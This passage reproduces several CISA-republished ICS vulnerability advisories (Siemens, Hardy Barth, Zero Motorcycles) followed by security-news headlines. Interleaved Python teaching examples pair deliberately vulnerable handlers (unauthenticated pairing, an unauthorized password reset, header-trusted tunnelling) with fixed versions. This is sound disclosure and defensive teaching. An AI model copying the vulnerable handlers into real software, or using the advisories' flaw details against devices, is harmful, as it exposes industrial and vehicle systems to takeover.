Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Metrics: CVSS version 3.1, base score 9.1 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C

Acknowledgments
Siemens ProductCERT reported these vulnerabilities to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms.
In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov.

Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-019200 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. It is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-14
Date        Revision  Summary
2026-04-14  1         Publication Date
2026-04-21  2         Initial CISA Republication of Siemens ProductCERT SSA-019200 advisory

Hardy Barth Salia EV Charge Controller

Summary
Successful exploitation of these vulnerabilities could allow a remote attacker to upload files of a dangerous type to the charge controller through its web interface; one of the two flaws requires no authentication at all. The following versions of Hardy Barth Salia EV Charge Controller are affected: Salia Board Firmware <= 2.3.81 (CVE-2025-5873, CVE-2025-10371).

CVSS v3 (higher of the two CVEs): 7.3
Vendor: Hardy Barth
Equipment: Hardy Barth Salia EV Charge Controller
Vulnerabilities: Unrestricted Upload of File with Dangerous Type

Background
Critical Infrastructure Sectors: Energy, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-5873
A vulnerability was found in eCharge Hardy Barth Salia PLCC 2.3.81 and has been declared critical. It affects unknown code of the file /firmware.php of the Web UI component. Manipulation of the argument media leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Affected Products: Hardy Barth Salia EV Charge Controller, Salia Board Firmware <= 2.3.81 (Product Status: known_affected)
Remediations: Hardy Barth did not respond to CISA's request for coordination. Contact Hardy Barth through their contact page (https://www.hardy-barth.de/de/kontakt) or through their eCharge brand (https://www.echarge.de/en/contact_company) for more information.
Relevant CWE: CWE-434 Unrestricted Upload of File with Dangerous Type
CVSS v3.1 base score 6.3 (MEDIUM): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CVE-2025-10371
A security flaw has been discovered in eCharge Hardy Barth Salia PLCC 2.3.81. It affects some unknown processing of the file /api.php. Manipulation of the argument setrfidlist results in unrestricted upload. The attack may be performed remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.
Affected Products: as for CVE-2025-5873, Salia Board Firmware <= 2.3.81 (Product Status: known_affected)
Remediations: as for CVE-2025-5873; no vendor fix is available.
Relevant CWE: CWE-434 Unrestricted Upload of File with Dangerous Type
CVSS v3.1 base score 7.3 (HIGH): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L (PR:N: no privileges required, unlike CVE-2025-5873)

Acknowledgments
CISA discovered a public Proof of Concept (PoC) authored by YZS17 and reported it to Hardy Barth.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time, although a public proof of concept exists (see Acknowledgments).

Revision History
Initial Release Date: 2026-04-21
2026-04-21  Rev. 1  Initial Publication

Siemens SINEC NMS

Summary
Siemens SINEC NMS, when used with the User Management Component (UMC), contains an authentication bypass vulnerability due to insufficient validation of user identity. This could allow an unauthenticated remote attacker to bypass authentication and gain unauthorized access to the application. Siemens has released a new version for SINEC NMS and recommends updating to the latest version. Affected: SINEC NMS (the advisory gives no version range; the vendor fix is V4.0 SP3).

CVSS v3: 7.3
Vendor: Siemens
Equipment: SINEC NMS
Vulnerabilities: Improper Verification of Cryptographic Signature

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-24032
The affected application contains an authentication weakness due to insufficient validation of user identity in the UMC component. This could allow an unauthenticated remote attacker to bypass authentication and gain unauthorized access to the application. (ZDI-CAN-27564)
Affected Products: Siemens SINEC NMS (Product Status: known_affected)
Remediations: Vendor fix, update to V4.0 SP3 or later. https://support.industry.siemens.com/cs/ww/en/view/110000760/
Relevant CWE: CWE-347 Improper Verification of Cryptographic Signature
CVSS v3.1 base score 7.3 (HIGH): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations, Additional Resources, Terms of Use, Legal Notice and Recommended Practices
Identical to those in the preceding Siemens SCALANCE advisory (Siemens operational guidelines for Industrial Security: https://www.siemens.com/cert/operational-guidelines-industrial-security; Siemens ProductCERT: https://www.siemens.com/cert/advisories; terms: https://www.siemens.com/productcert/terms-of-use; CISA recommended practices for control systems on the ICS webpage at cisa.gov).

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-801704 from a direct conversion of the vendor's CSAF advisory, provided "as-is" for informational purposes only. CISA is not responsible for its editorial or technical accuracy, provides no warranties, and does not endorse any commercial product or service. Contact Siemens ProductCERT directly with any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-14
2026-04-14  Rev. 1  Publication Date
2026-04-21  Rev. 2  Initial CISA Republication of Siemens ProductCERT SSA-801704 advisory

Zero Motorcycles Firmware

Summary
Successful exploitation of this vulnerability could allow an attacker to pair with a motorcycle via Bluetooth, gaining unauthorized access to all Bluetooth functions, including changing the firmware. Affected: Zero Motorcycles firmware <= 44 (CVE-2026-1354).

CVSS v3: 6.4
Vendor: Zero Motorcycles
Equipment: Zero Motorcycles Firmware
Vulnerabilities: Key Exchange without Entity Authentication

Background
Critical Infrastructure Sectors: Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2026-1354
Zero Motorcycles firmware versions 44 and prior enable an attacker to forcibly pair a device with the motorcycle via Bluetooth. Once paired, the attacker can use the over-the-air firmware update functionality to potentially upload malicious firmware to the motorcycle. The motorcycle must first be in Bluetooth pairing mode, and the attacker must be in proximity of the vehicle and understand the full pairing process in order to pair their device with it. The attacker's device must remain paired with and in proximity of the motorcycle for the entire duration of the firmware update.
Affected Products: Zero Motorcycles firmware <= 44 (Product Status: known_affected)
Remediations: Zero Motorcycles has investigated this report and cautions users to pair their mobile device to their vehicle in a safe location where they can be sure no one else will try to pair at the same time. Once initiated, complete the full pairing process and confirm it is successful. Store physical keys in a secure location and do not leave the bike unattended with the key in the "ON" position. Zero Motorcycles plans to address this issue in a firmware update scheduled for release in May 2026; update the firmware to the latest available version once it is out.
Relevant CWE: CWE-322 Key Exchange without Entity Authentication
CVSS v3.1 base score 6.4 (MEDIUM): CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H (AV:A reflects Bluetooth range; AC:H and UI:R reflect the pairing-mode and proximity conditions above; the impact is to integrity and availability, not confidentiality)

Acknowledgments
Persephone Karnstein of Bureau Veritas Cybersecurity North America reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability has a high attack complexity.

Revision History
Initial Release Date: 2026-04-21
2026-04-21  Rev. 1  Initial Publication
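CWE-322 is the key-exchange half of the pairing problem: the two parties do agree a key, but nothing in the exchange proves who the peer is, so whoever answers while the bike is advertising in pairing mode becomes a trusted device. The toy protocol below is an added example, not Zero Motorcycles' pairing code and not Bluetooth LE itself; the Diffie-Hellman group, the message layout and the six-digit passkey channel are assumptions. It shows the unauthenticated flow accepting a rogue phone, and the same exchange rejecting that phone once each side must prove knowledge of a passkey displayed on the vehicle.

```python
"""Toy model of CWE-322 (key exchange without entity authentication) in a
pairing flow, beside the same exchange bound to a passkey.  Added example, not
Zero Motorcycles' pairing code or Bluetooth LE; group, messages and the passkey
channel are assumptions."""
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman group (127-bit Mersenne prime).  Far too small for real
# use; BLE Secure Connections uses P-256 ECDH.  The group is not the point here.
P = (1 << 127) - 1
G = 5


class Device:
    """One pairing endpoint: the motorcycle, the owner's phone, or a rogue phone."""

    def __init__(self, name: str, passkey: str):
        self.name = name
        self.passkey = passkey          # code shown on the bike's display (assumed out-of-band channel)
        self._priv = secrets.randbelow(P - 2) + 1
        self.pub = pow(G, self._priv, P)
        self.session_key = None

    def derive(self, peer_pub: int) -> None:
        if not 1 < peer_pub < P - 1:    # refuse degenerate public values
            raise ValueError("bad public value")
        shared = pow(peer_pub, self._priv, P).to_bytes(16, "big")
        self.session_key = hashlib.sha256(b"pairing-v1|" + shared).digest()

    def confirm(self, transcript: bytes, role: bytes) -> bytes:
        """Confirmation MAC over the transcript, keyed with the session key AND
        the passkey.  A peer that completed the DH but lacks the passkey cannot
        produce it; the role label stops a value being reflected back."""
        key = hashlib.sha256(self.session_key + self.passkey.encode()).digest()
        return hmac.new(key, role + b"|" + transcript, "sha256").digest()


def transcript(initiator: Device, responder: Device) -> bytes:
    return b"%s|%d|%s|%d" % (initiator.name.encode(), initiator.pub,
                             responder.name.encode(), responder.pub)


def pair_unauthenticated(bike: Device, phone: Device) -> bool:
    """The weakness: whoever answers while the bike is in pairing mode ends up
    sharing a key with it.  Nothing proves the phone belongs to the owner."""
    bike.derive(phone.pub)
    phone.derive(bike.pub)
    return bike.session_key == phone.session_key


def pair_authenticated(bike: Device, phone: Device) -> bool:
    """Same exchange, then mutual confirmation bound to the passkey.  A side
    that cannot verify the peer's confirm value aborts and keeps no key."""
    bike.derive(phone.pub)
    phone.derive(bike.pub)
    t = transcript(phone, bike)
    phone_to_bike = phone.confirm(t, b"initiator")      # values sent over the air
    bike_to_phone = bike.confirm(t, b"responder")
    bike_accepts = hmac.compare_digest(phone_to_bike, bike.confirm(t, b"initiator"))
    phone_accepts = hmac.compare_digest(bike_to_phone, phone.confirm(t, b"responder"))
    if not (bike_accepts and phone_accepts):
        bike.session_key = phone.session_key = None
        return False
    return True


def demo() -> dict:
    passkey = "482913"                                   # constructed: value on the dashboard
    r = {}
    bike, owner = Device("zero-bike", passkey), Device("owner-phone", passkey)
    r["owner_unauth"] = pair_unauthenticated(bike, owner)
    bike, rogue = Device("zero-bike", passkey), Device("rogue-phone", "000000")
    r["rogue_unauth"] = pair_unauthenticated(bike, rogue)   # True: rogue is now "paired"
    bike, owner = Device("zero-bike", passkey), Device("owner-phone", passkey)
    r["owner_auth"] = pair_authenticated(bike, owner)
    bike, rogue = Device("zero-bike", passkey), Device("rogue-phone", "000000")
    r["rogue_auth"] = pair_authenticated(bike, rogue)       # False: no passkey, no pairing
    r["rogue_got_key"] = bike.session_key is not None
    return r


if __name__ == "__main__":
    print(demo())
```

BLE LE Secure Connections reaches the same goal with P-256 ECDH plus a numeric-comparison, passkey or out-of-band association model; the "Just Works" model gives exactly the behaviour of pair_unauthenticated. Until the planned firmware update lands, the vendor's advice to pair only in a safe location is the only control, because the bike cannot distinguish the owner's phone from any other device that answers.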

Siemens SINEC NMS

Summary
SINEC NMS before V4.0 SP3 contains an authorization bypass vulnerability that could allow an authenticated attacker to bypass authorization checks and reset the password of any arbitrary user account. Siemens has released a new version for SINEC NMS and recommends updating to the latest version. Affected: SINEC NMS before V4.0 SP3 (CVE-2026-25654).

CVSS v3: 8.8
Vendor: Siemens
Equipment: SINEC NMS
Vulnerabilities: Authorization Bypass Through User-Controlled Key

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-25654
Affected products do not properly validate user authorization when processing password reset requests. This could allow an authenticated remote attacker to bypass authorization checks, leading to the ability to reset the password of any arbitrary user account.
Affected Products: Siemens SINEC NMS before V4.0 SP3 (Product Status: known_affected)
Remediations: Mitigation: limit network access to trusted users and systems only. Vendor fix: update to V4.0 SP3 or later. https://support.industry.siemens.com/cs/ww/en/view/110000760/
Relevant CWE: CWE-639 Authorization Bypass Through User-Controlled Key
CVSS v3.1 base score 8.8 (HIGH): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (any low-privileged account suffices, since the account to reset is chosen by the caller)

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations, Additional Resources, Terms of Use, Legal Notice and Recommended Practices
Identical to those in the preceding Siemens SCALANCE advisory (Siemens operational guidelines for Industrial Security: https://www.siemens.com/cert/operational-guidelines-industrial-security; Siemens ProductCERT: https://www.siemens.com/cert/advisories; terms: https://www.siemens.com/productcert/terms-of-use; CISA recommended practices for control systems on the ICS webpage at cisa.gov).

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-605717 from a direct conversion of the vendor's CSAF advisory, provided "as-is" for informational purposes only. CISA is not responsible for its editorial or technical accuracy, provides no warranties, and does not endorse any commercial product or service. Contact Siemens ProductCERT directly with any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-14
2026-04-14  Rev. 1  Publication Date
2026-04-21  Rev. 2  Initial CISA Republication of Siemens ProductCERT SSA-605717 advisory
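CVE-2026-25654 is CWE-639 in its plainest form: the request names the account to act on, and the server checks only that the caller is logged in. The handler pair below is an added example, not SINEC NMS code; the user store, session object and request fields are assumptions. The fixed version authorizes the (caller, target) pair rather than the caller alone: a self-service reset must present the current password, and a reset of someone else's account requires the admin role.

```python
"""Password-reset handler with the CWE-639 gap the SINEC NMS advisory
describes, beside the authorized version.  Added example, not SINEC NMS code;
users, sessions and request fields are assumptions."""
from dataclasses import dataclass
import hashlib
import secrets


@dataclass
class User:
    user_id: int
    name: str
    role: str            # "admin" or "operator"
    pw_hash: bytes = b""


@dataclass
class Session:
    user_id: int


class Forbidden(Exception):
    pass


USERS = {1: User(1, "admin", "admin"), 2: User(2, "alice", "operator"), 3: User(3, "bob", "operator")}


def _hash(password: str, salt: bytes) -> bytes:
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def verify_password(user: User, password: str) -> bool:
    if not user.pw_hash:
        return False
    salt, digest = user.pw_hash[:16], user.pw_hash[16:]
    return secrets.compare_digest(digest, _hash(password, salt)[16:])


def reset_password_vulnerable(session: Session, request: dict) -> int:
    """CWE-639: the target account comes straight from the request, and the
    only check is that *some* valid session exists."""
    if session.user_id not in USERS:
        raise Forbidden("not logged in")
    target = USERS[int(request["user_id"])]          # user-controlled key, never authorized
    target.pw_hash = _hash(request["new_password"], secrets.token_bytes(16))
    return target.user_id


def reset_password_fixed(session: Session, request: dict) -> int:
    """Authorize the (caller, target) pair.  Operators change only their own
    password and must prove the current one; only admins reset other accounts."""
    caller = USERS.get(session.user_id)
    if caller is None:
        raise Forbidden("not logged in")
    target_id = int(request.get("user_id", caller.user_id))
    target = USERS.get(target_id)
    if target is None:
        raise Forbidden("not permitted")             # same wording as the authz failure
    if target_id == caller.user_id:
        if not verify_password(caller, request.get("current_password", "")):
            raise Forbidden("current password required")
    elif caller.role != "admin":
        raise Forbidden("not permitted")
    target.pw_hash = _hash(request["new_password"], secrets.token_bytes(16))
    return target.user_id


def demo() -> dict:
    r = {}
    USERS[2].pw_hash = _hash("alice-old", secrets.token_bytes(16))
    alice = Session(user_id=2)
    # Vulnerable handler: operator alice resets the admin's password.
    r["vuln_admin_reset"] = reset_password_vulnerable(alice, {"user_id": "1", "new_password": "pwned"})
    # Fixed handler: the same request is refused.
    try:
        reset_password_fixed(alice, {"user_id": "1", "new_password": "pwned"})
        r["fixed_admin_reset"] = "allowed"
    except Forbidden as e:
        r["fixed_admin_reset"] = str(e)
    # Fixed handler: alice changes her own password after proving the old one.
    r["self_reset"] = reset_password_fixed(alice, {"current_password": "alice-old", "new_password": "alice-new"})
    r["new_pw_works"] = verify_password(USERS[2], "alice-new")
    r["old_pw_works"] = verify_password(USERS[2], "alice-old")
    # Fixed handler: an admin may reset bob.
    r["admin_resets_bob"] = reset_password_fixed(Session(user_id=1), {"user_id": "3", "new_password": "bob-temp"})
    return r


if __name__ == "__main__":
    print(demo())
```

Returning the same Forbidden for "no such user" and "not yours" keeps the endpoint from doubling as an account-enumeration oracle. The vulnerable handler is also why PR:L is enough for a HIGH rating: any operator account becomes an administrator after one request.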

Siemens Industrial Edge Management

Summary
Industrial Edge Management contains an authorization bypass vulnerability that could be exploited by an unauthenticated remote attacker to circumvent authentication and access connected Industrial Edge Devices through the remote connection feature. Siemens has released new versions for the affected products and recommends updating to the latest versions. Affected versions (all CVE-2026-33892):
Industrial Edge Management Pro V1: >= 1.7.6 and < 1.15.17
Industrial Edge Management Pro V2: >= 2.0.0 and < 2.1.1
Industrial Edge Management Virtual: >= 2.2.0 and < 2.8.0

CVSS v3: 7.1
Vendor: Siemens
Equipment: Industrial Edge Management
Vulnerabilities: Authentication Bypass by Primary Weakness

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-33892
Affected management systems do not properly enforce user authentication on remote connections to devices. This could allow an unauthenticated remote attacker to circumvent authentication and impersonate a legitimate user. Successful exploitation requires that the attacker has identified the header and port used for remote connections to devices and that the remote connection feature is enabled for the device. Exploitation allows the attacker to tunnel to the device. Security features on the device itself (e.g., app-specific authentication) are not affected.
Affected Products: Industrial Edge Management Pro V1, Pro V2 and Virtual in the version ranges above (Product Status: known_affected)
Remediations: Mitigation: ensure network access to affected products is limited to trusted parties only. Vendor fix: update Pro V1 to V1.15.17 or later, Pro V2 to V2.1.1 or later, and Virtual to V2.8.0 or later (https://iehub.eu1.edge.siemens.cloud/).
Relevant CWE: CWE-305 Authentication Bypass by Primary Weakness
CVSS v3.1 base score 7.1 (HIGH): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L (S:C: the management system is the vulnerable component, the tunnelled-to Edge Device is the impacted one)

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations, Additional Resources, Terms of Use, Legal Notice and Recommended Practices
Identical to those in the preceding Siemens SCALANCE advisory (Siemens operational guidelines for Industrial Security: https://www.siemens.com/cert/operational-guidelines-industrial-security; Siemens ProductCERT: https://www.siemens.com/cert/advisories; terms: https://www.siemens.com/productcert/terms-of-use; CISA recommended practices for control systems on the ICS webpage at cisa.gov).

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-609469 from a direct conversion of the vendor's CSAF advisory, provided "as-is" for informational purposes only. CISA is not responsible for its editorial or technical accuracy, provides no warranties, and does not endorse any commercial product or service. Contact Siemens ProductCERT directly with any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-14
2026-04-14  Rev. 1  Publication Date
2026-04-21  Rev. 2  Initial CISA Republication of Siemens ProductCERT SSA-609469 advisory
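The Industrial Edge Management flaw sits on the authentication side (CWE-305): per the advisory, knowing the header and port used for remote connections is enough to have a tunnel opened to a device. The model below is an added example, not Siemens code; the header names, the token format and the server secret are assumptions. It contrasts a tunnel endpoint that trusts the device header with one that additionally requires a signed, expiring token bound to the requested device, which is what defeats a request forged from outside a management session.

```python
"""Tunnel endpoint that trusts a header (the CWE-305 pattern) beside one that
requires a signed, expiring, device-bound token.  Added example, not Siemens
code; header names, token format and the secret are assumptions."""
import hashlib
import hmac
import time

SERVER_SECRET = b"constructed-server-secret-do-not-reuse"   # assumed: HMAC key held by the management system
TOKEN_TTL = 300


class TunnelDenied(Exception):
    pass


def open_tunnel_vulnerable(headers: dict) -> str:
    """Knowing the header name (and the port) is all it takes."""
    device = headers.get("X-IEM-Remote-Device")
    if not device:
        raise TunnelDenied("no device header")
    return f"tunnel->{device}"


def issue_token(user: str, device: str, now: float = None) -> str:
    """Minted by the management system for an already-authenticated session."""
    exp = int((now or time.time()) + TOKEN_TTL)
    payload = f"{user}|{device}|{exp}"
    tag = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def open_tunnel_fixed(headers: dict, now: float = None) -> str:
    """The header still names the device, but identity comes from the token:
    signature, expiry and device binding are all checked before tunnelling."""
    device = headers.get("X-IEM-Remote-Device")
    token = headers.get("Authorization", "")
    if not device or not token.startswith("Bearer "):
        raise TunnelDenied("missing device or token")
    try:
        user, tok_device, exp, tag = token[7:].split("|")
        exp = int(exp)
    except ValueError:
        raise TunnelDenied("malformed token") from None
    expected = hmac.new(SERVER_SECRET, f"{user}|{tok_device}|{exp}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise TunnelDenied("bad signature")
    if exp < (now or time.time()):
        raise TunnelDenied("token expired")
    if tok_device != device:
        raise TunnelDenied("token not issued for this device")
    return f"tunnel->{device} as {user}"


def demo() -> dict:
    r = {}
    probe = {"X-IEM-Remote-Device": "edge-device-07"}       # constructed request headers
    r["vuln"] = open_tunnel_vulnerable(probe)
    cases = {
        "no_token": probe,
        "forged": {**probe, "Authorization": "Bearer admin|edge-device-07|9999999999|00"},
        "wrong_device": {**probe, "Authorization": "Bearer " + issue_token("alice", "edge-device-01")},
        "expired": {**probe, "Authorization": "Bearer " + issue_token("alice", "edge-device-07", now=time.time() - 2 * TOKEN_TTL)},
        "valid": {**probe, "Authorization": "Bearer " + issue_token("alice", "edge-device-07")},
    }
    for name, hdrs in cases.items():
        try:
            r[name] = open_tunnel_fixed(hdrs)
        except TunnelDenied as e:
            r[name] = f"denied: {e}"
    return r


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:13} {v}")
```

A real deployment would issue the token from the login session and keep the signing key out of any request path; the point is that the device name in a header is never the proof of identity, and that the token is useless for a device other than the one it was minted for.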

Siemens RUGGEDCOM CROSSBOW Station Access Controller (SAC)

Summary
RUGGEDCOM CROSSBOW Station Access Controller (SAC) contains a vulnerability that could allow an attacker to achieve arbitrary code execution or create a denial-of-service condition. Siemens has released a new version for RUGGEDCOM CROSSBOW Station Access Controller (SAC) and recommends updating to the latest version. Affected: RUGGEDCOM CROSSBOW Station Access Controller (SAC) versions < 5.8 (CVE-2025-6965).

CVSS v3: 7.7
Vendor: Siemens
Equipment: RUGGEDCOM CROSSBOW Station Access Controller (SAC)
Vulnerabilities: Numeric Truncation Error

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-6965
A vulnerability exists in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available, which could lead to memory corruption. The CVE description recommends upgrading SQLite to version 3.50.2 or above; for CROSSBOW SAC the fixed library ships with the product update below. The flaw is in the bundled SQLite, and the AC:H/PR:L rating indicates that reaching it through CROSSBOW SAC requires a low-privileged account and non-trivial conditions.
Affected Products: Siemens RUGGEDCOM CROSSBOW Station Access Controller (SAC) < 5.8 (Product Status: known_affected)
Remediations: Vendor fix, update to V5.8 or later. https://support.industry.siemens.com/cs/ww/en/view/110000841/
Relevant CWE: CWE-197 Numeric Truncation Error
CVSS v3.1 base score 7.7 (HIGH): CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations, Additional Resources, Terms of Use, Legal Notice and Recommended Practices
Identical to those in the preceding Siemens SCALANCE advisory (Siemens operational guidelines for Industrial Security: https://www.siemens.com/cert/operational-guidelines-industrial-security; Siemens ProductCERT: https://www.siemens.com/cert/advisories; terms: https://www.siemens.com/productcert/terms-of-use; CISA recommended practices for control systems on the ICS webpage at cisa.gov).

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-225816 from a direct conversion of the vendor's CSAF advisory, provided "as-is" for informational purposes only. CISA is not responsible for its editorial or technical accuracy, provides no warranties, and does not endorse any commercial product or service. Contact Siemens ProductCERT directly with any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-14
2026-04-14  Rev. 1  Publication Date
2026-04-21  Rev. 2  Initial CISA Republication of Siemens ProductCERT SSA-225816 advisory

0
Vercel Employee's AI Tool Access Led to Data Breach

Stolen OAuth tokens, which are at the root of these breaches, "are the new attack surface, the new lateral movement," a researcher notes.

0
Serial-to-IP Devices Hide Thousands of Old & New Bugs

The OT devices that translate machine talk into Internet-speak are riddled with vulnerabilities and more frequently targeted for attacks, researchers say.

0
Mastodon says its flagship server was hit by a DDoS attack

The DDoS attack against Mastodon's flagship server comes less than a week after Bluesky was targeted with junk web traffic.

0
Bitcoin daily gains near 3% as stocks ignore US-Iran war threat, oil drops

Bitcoin bulls avoided a correction as US markets opened, but analysis warned that Strategy was responsible for much of the latest BTC price strength.

0
Microsoft: Teams increasingly abused in helpdesk impersonation attacks

Microsoft is warning of threat actors increasingly abusing external Microsoft Teams collaboration and relying on legitimate tools for access and lateral movement on enterprise networks. [...]

5
App host Vercel says it was hacked and customer data stolen

Vercel blamed its breach on an earlier hack at Context AI, which allowed hackers to hijack a Vercel employee's account to steal customer data.

0
WhatsApp Leaks User Metadata to Attackers

Strangers can infer limited info about you without knowing or messaging you, which could theoretically aid certain kinds of malicious activity.

0
The backup myth that is putting businesses at risk

Backups protect data, but don't keep your business running during downtime. Datto shows why BCDR is essential to keep operations running during ransomware and outages. [...]

0
British Scattered Spider hacker pleads guilty to crypto theft charges

A British man, believed to be the leader of the Scattered Spider cybercrime collective, has pleaded guilty in the United States to charges of wire fraud and aggravated identity theft. [...]

0
CISA Adds Eight Known Exploited Vulnerabilities to Catalog

CISA has added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2023-27351 PaperCut NG/MF Improper Authentication Vulnerability
- CVE-2024-27199 JetBrains TeamCity Relative Path Traversal Vulnerability
- CVE-2025-2749 Kentico Xperience Path Traversal Vulnerability
- CVE-2025-32975 Quest KACE Systems Management Appliance (SMA) Improper Authentication Vulnerability
